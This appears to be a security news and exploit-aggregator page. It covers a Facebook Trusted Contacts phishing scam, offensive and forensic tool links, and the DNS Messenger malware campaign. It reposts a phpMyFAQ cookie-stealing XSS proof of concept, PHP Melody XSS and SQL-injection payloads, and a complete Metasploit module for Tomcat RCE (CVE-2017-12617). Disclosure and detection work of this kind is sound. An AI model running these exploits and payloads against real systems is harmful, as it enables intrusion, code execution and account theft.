Leaderboard

Earlier this month, Access Now’s Digital Security Helpline began to get reports of hacked Facebook accounts that allowed us to identify a new method for targeted “phishing,” also known as “spear phishing.” Today, we’re publishing details of the attack so that users are better informed and able to identify this attack. Phishing is a method of obtaining unauthorized access to an account or service by tricking an authorized user into providing their credentials. This is usually done through mass spam messages. Spear phishing is an attack that targets a particular person and uses special messages that are more likely to appear genuine to a specific person. Read more about a recent spear phishing attack here. The new attack targets people using Facebook, and it relies on your lack of knowledge about the platform’s “Trusted Contacts” feature. Trusted Contacts is a system created by Facebook to help you gain access to your account if you forget your password or your account is locked. If you enable Trusted Contacts, Facebook will ask you to identify three to five people. If you need access to your account, Facebook will send part of a code to each of these users that can be combined to gain access to your account. Anyone who has a Facebook account could fall victim to the attack, but so far we’re seeing the majority of reports from human right defenders and activists from the Middle East and North Africa. How the attacks works Here’s how the attacker attempts to exploit your trust in order to extract the information needed to steal your account: You get a message from an attacker on Facebook Messenger, who is using the compromised account of someone on your Friends list. The attacker asks for your help recovering their account, explaining that you are listed as one of their Trusted Contacts on Facebook, and tells you that you will receive a code for recovering their account. Then the attacker triggers the “I forgot my password” feature for your Facebook account and requests a recovery code. In an effort to help, you send the code you’ve just received to your “friend.” Using the code, the attacker can now steal your account from you, and use it to victimize other people. For visual learners, see here. In the cases we have observed, the attacker doesn’t stop after compromising just one account. It’s replicated across users’ social networks. When a message comes from a “friend,” people tend to trust it. That makes it an especially effective attack vector. How to defend yourself against attack To help you stay safe, we encourage you to follow these recommendations: Treat urgent, unexpected messages with suspicion: Phishing messages often appear to come from a trusted friend. But if you get an odd message, ask yourself, are you already aware of being on a list of “Trusted Contacts” for any of your Facebook friends? Confirm with your friend: Try to verify your friend’s identity by telephone or in person. Act slowly and with caution. Attacks are always evolving. In general, try to stay calm when you get a message where the sender appears to want to trigger a strong emotional reaction, like anger or fear. This might make you think you have to hurry, and it could impair your ability to evaluate the situation objectively. Don’t panic. Figure out what is really happening before you take action. Learn how “Trusted Contacts” actually works: It doesn’t work the way the phishing message in this attack suggests. We explain the details below. How Facebook’s “Trusted Contacts” feature really works Here are the basics: What is the Trusted Contacts feature? It’s an account recovery feature in Facebook that’s aimed at helping you regain access to your Facebook account and the email accounts and phone numbers linked to it. How does the Trusted Contacts feature work? To activate this feature, you select three to five of your Facebook friends. If you lose access to your account, these friends can generate codes from their Facebook account and forward them to you. Note: Facebook does not send these text messages to your friends. It’s your friends who need to generate the codes for you, as shown in the screenshot below: What to do if you get a message like the one we describe If you get a message like the one we describe, asking you to send a message with a code from Facebook, don’t send anything to your “friend.” Instead, report the account here as soon as possible. If you need any help because your account has been hijacked, through this or any other attack vector, we encourage you to contact us at the Digital Security Helpline. We’re here every day, and no matter when you reach out, one of our incident handlers will reply to you within two hours. Here’s a step-by-step guide for contacting us, and you have the option of sending an email, encrypted if you desire, to help @ accessnow . org. Here’s a visual to help illustrate the attack. Please spread the word! Via accessnow.org

Synopsis: Cameradar hacks its way into RTSP CCTV cameras. An RTSP stream access tool that comes with its library. Link: https://github.com/EtixLabs/cameradar

Synopsis: Noriben is a Python-based script that works in conjunction with SysInternals Procmon to automatically collect, analyze, and report on run-time indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities. Link: https://github.com/Rurik/noriben

Synopsis: UEFITool is a cross-platform C++/Qt program for parsing, extracting and modifying UEFI firmware images. It supports parsing of full BIOS images starting with the flash descriptor or any binary files containing UEFI volumes. Original development was started here at MDL forums as a cross-platform analog to PhoenixTool's structure mode with some additional features, but the program's engine was proven to be usefull for another projects like UEFIPatch, UBU and OZMTool. Link: https://github.com/LongSoft/UEFITool

Synopsis: PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system. Link: https://github.com/ufrisk/pcileech/

Synopsis: From the attacker’s perspective, the more logical way to do things nowadays is to simply move to the next level down into the software stack — after boot code, that is the way to the BIOS. Intel Boot Guard is an excellent example of a complex technology where exist a lot of places where making a small mistake allows an attacker to bypass full technology. Link: https://medium.com/@matrosov/bypass-intel-boot-guard-cc05edfca3a9

Ce viata? Ca de la anul expira tot ce e mai vechi de 5 ani

# Exploit Title: phpMyFAQ 2.9.8 Stored XSS # Vendor Homepage: http://www.phpmyfaq.de/ # Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip # Exploit Author: Ishaq Mohammed # Contact: https://twitter.com/security_prince # Website: https://about.me/security-prince # Category: webapps # CVE: CVE-2017-14619 1. Description Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows remote attackers to inject arbitrary web script or HTML via the "Title of your FAQ" field in the Configuration Module. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14619 2. Proof of Concept Steps to Reproduce: 1. Open the affected link http://localhost/phpmyfaq/admin/?action=config with logged in user with administrator privileges 2. Enter the <marquee onscroll=alert(document.cookie)> in the “Title of your FAQ field” 3. Save the Configuration 4. Login using any other user or simply click on the phpMyFAQ on the top-right hand side of the web portal 3. Solution: The Vulnerability will be fixed in the next release of phpMyFAQ # 0day.today [2017-10-13] # Source: 0day.today

This Metasploit module uploads a jsp payload and executes it. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Tomcat RCE via JSP Upload Bypass', 'Description' => %q{ This module uploads a jsp payload and executes it. }, 'Author' => 'peewpw', 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2017-12617' ], [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ], [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ] ], 'Privileged' => false, 'Platform' => %w{ linux win }, # others? 'Targets' => [ [ 'Automatic', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ], [ 'Java Windows', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ], [ 'Java Linux', { 'Arch' => ARCH_JAVA, 'Platform' => 'linux' } ] ], 'DisclosureDate' => 'Oct 03 2017', 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]), Opt::RPORT(8080) ]) end def check testurl = Rex::Text::rand_text_alpha(10) testcontent = Rex::Text::rand_text_alpha(10) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"), 'method' => 'PUT', 'data' => "<% out.println(\"#{testcontent}\");%>" }) res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"), 'method' => 'GET' }) if res1 && res1.body.include?(testcontent) send_request_cgi( opts = { 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"), 'method' => 'DELETE' }, timeout = 1 ) return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit print_status("Uploading payload...") testurl = Rex::Text::rand_text_alpha(10) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"), 'method' => 'PUT', 'data' => payload.encoded }) if res && res.code == 201 res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"), 'method' => 'GET' }) if res1 && res1.code == 200 print_status("Payload executed!") else fail_with(Failure::PayloadFailed, "Failed to execute the payload") end else fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end end # 0day.today [2017-10-13] # Source: 0day.today

Researchers have discovered a new version of the DNS Messenger attack which masquerades as the US Securities and Exchange Commission (SEC) and hosts malware on compromised government servers. On Wednesday, security researches from Cisco Talos revealed the results of an investigation into DNS Messenger, a fileless attack which uses DNS queries to push malicious PowerShell commands on compromised computers. A new version of this attack, which the team say is "highly targeted in nature," now attempts to compromise victim systems by pretending to be the SEC Electronic Data Gathering Analysis, and Retrieval (EDGAR) system -- recently at the heart of a data breach related to financial fraud -- in specially crafted phishing email campaigns. These spoofed emails made them seem legitimate, but should a victim open them and download a malicious attachment contained within, a "multi-stage infection process" begins. The malicious attachments used in this campaign are Microsoft Word documents. However, rather than using macros or OLE objects to gain a foothold into a system, the threat actors used a less common method of infection, Dynamic Data Exchange (DDE), to perform code execution and install a remote access Trojan (RAT). It is important to note that Microsoft says that DDE is not an exploitable issue, but rather a feature "by design," and will not be removed. Talos disagrees, and claims that the team has witnessed DDE "actively being used by attackers in the wild, as demonstrated in this attack." According to Talos, the latest malware campaign is similar to its last evolution. The infection process uses DNS TXT records to create a bidirectional command-and-control (C2) channel, in which attackers are able to interact with the Windows Command Processor using the contents of DNS TXT record queries and responses generated from the threat actor's DNS server. When opened, users are asked to permit external links to be retrieved. Should they agree, the malicious document reaches out to an attacker-controlled command-and-control (C&C) server which executes the first malware infection. This malware was initially hosted on a Louisiana state government website, "seemingly compromised and used for this purpose," according to the team. Speaking to ZDNet, Craig Williams, Senior Technical Leader at Cisco Talos said that by the time the findings were made public, the files were removed from the server. PowerShell commands then come into play. Code is retrieved, obfuscated, and then executed, which kicks off persistence on systems, registry rewrites, scheduled task creation, and DNS requests are made. "In this particular case, the malware featured the capability to leverage WMI, ADS, scheduled tasks, as well as registry keys to obtain persistence," the researchers note. "The use of DNS as a conveyance for later stage code and C2 communications is also becoming more and more commonplace." While the team was unable to obtain the next stage of PowerShell code from the C2 servers, Talos says it is likely that communications are restricted to prevent security researchers from being able to track the team and their techniques further, making it more likely that their DNS-based attacks can fly under the radar for longer periods. However, according to researcher Anthony Yates, he was able to secure the final payload by analyzing some of the findings. Yates says that the payload is typical C&C bot code, and includes information gathering commands -- suggesting the purpose of the DNS attack is for cyberespionage. "Attackers often employ multiple layers of obfuscation in an attempt to make analysis more difficult, evade detection and prevention capabilities, and continue to operate under the radar by limiting their attacks to only the organizations that they are targeting," Talos says. "It is also important for organizations to be aware of some of the more interesting techniques that malware is using to execute malicious code on systems and gain persistence on systems once they are infected." Via zdnet.com

Vulnerabilities Summary The following advisory describes three (3) vulnerabilities found in PHP Melody version 2.7.3. PHP Melody is a “self-hosted Video CMS which evolved over the last 9 years. SEO optimization, unbeaten security and speed are advantages you no longer have to compromise on. A truly great CMS should help you save time and make your life easier not complicate it. Nobody enjoys spending time and money on inferior solutions. If you value your time, don’t settle for anything but the best video CMS with a proven track record, constant support and updates.” The vulnerabilities found in PHP Melody are: Stored PreAuth XSS that leads to administrator account takeover SQL Injection (1) SQL Injection (2) Credit An independent security researcher, Paulos Yibelo, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. Vendor response PHP Melody has released patches to address this vulnerability. For more information: http://www.phpsugar.com/blog/2017/10/php-melody-v2-7-3-maintenance-release/ Vulnerabilities details Stored PreAuth XSS that leads to administrator account takeover User controlled input is not sufficiently sanitized, such that by sending a POST request to page_manager.php with the following parameters (vulnerable parameter – page_title) page_manager.php?do=new&id=&author=&showinmenu=0&meta_keywords=555-555-0199@example.com&status=0&submit=Publish&page_name=Peter+Winter&page_title=408b7<script>alert(1)<%2fscript>f2faf An attacker can trigger the vulnerability and when administrator/moderator/editor or anyone with privileges visits Admin access /admin/pages.php?page=1 the payload is triggered and the alert is executed. SQL Injection (1) User controlled input is not sufficiently sanitized, by sending a POST request to /phpmelody/admin/edit_category.php with the following parameters: category=3&meta_keywords=555-555-0199@example.com&tag=categoryone&save=Save$name=Sample+Category+%231&image='&meta_title=555-555-0199@example.com The vulnerable parameter is the POST “image” parameter. We can send a single quote (‘) to verify and the server will respond with an SQL error. We can inject SQL Queries here or extract data. This attack requires an admin/modernator or editor to visit a malicious website that will submit the form with a malicious “image” parameter as an Injection SQL Injection (2) SQL Injection is on a cookie-value and can be exploited without any user interaction. The cookie value “aa_pages_per_page” is the vulnerable parameter and we can use time based SQL Injection techniques to verify, The payload we used ‘ AND benchmark(20000000%2csha1(1))—makes the server sleep for a long time (5-20 seconds). Source: https://blogs.securiteam.com/index.php/archives/3464

Synopsis: In past blog posts, we shared our approach to hunting for traditional in-memory attacks along with in-depth analysis of many injection techniques. As a follow up to my DerbyCon presentation, this post will investigate an emerging trend of adversaries using .NET-based in-memory techniques to evade detection. I’ll discuss both eventing (real-time) and on-demand based detection strategies of these .NET techniques. At Endgame, we understand that these differing approaches to detection and prevention are complimentary, and together result in the most robust defense against in-memory attacks. Link: https://www.endgame.com/blog/technical-blog/hunting-memory-net-attacks

Synopsis: Small and highly portable detection tests mapped to the Mitre ATT&CK Framework. Link: https://github.com/redcanaryco/atomic-red-team (via https://twitter.com/redcanaryco/status/918236402814394368)

Synopsis: A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns by leveraging Sysmon and Windows Events logs. This project will provide specific chains of events exclusively at the host level so that you can take them and develop logic to deploy queries or alerts in your preferred tool or format such as Splunk, ELK, Sigma, GrayLog etc. This repo will follow the structure of the MITRE ATT&CK framework which categorizes post-compromise adversary behavior in tactical groups. In addition, it will provide information about hunting tools/platforms developed by the infosec community for testing and enterprise-wide hunting. Link: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook

Your Computer’s Hard Drive Can Be Used to Listen to What You’re Saying Link: https://blog.hackster.io/your-computers-hard-drive-can-be-used-to-listen-to-what-you-re-saying-808b83f19f80

Disassembler and Runtime Analysis (or how IDA Pro has some difficulties when displaying correctly the assembly of the patched run-time whilst using a Graph view) Link: http://blog.talosintelligence.com/2017/10/disassembler-and-runtime-analysis.html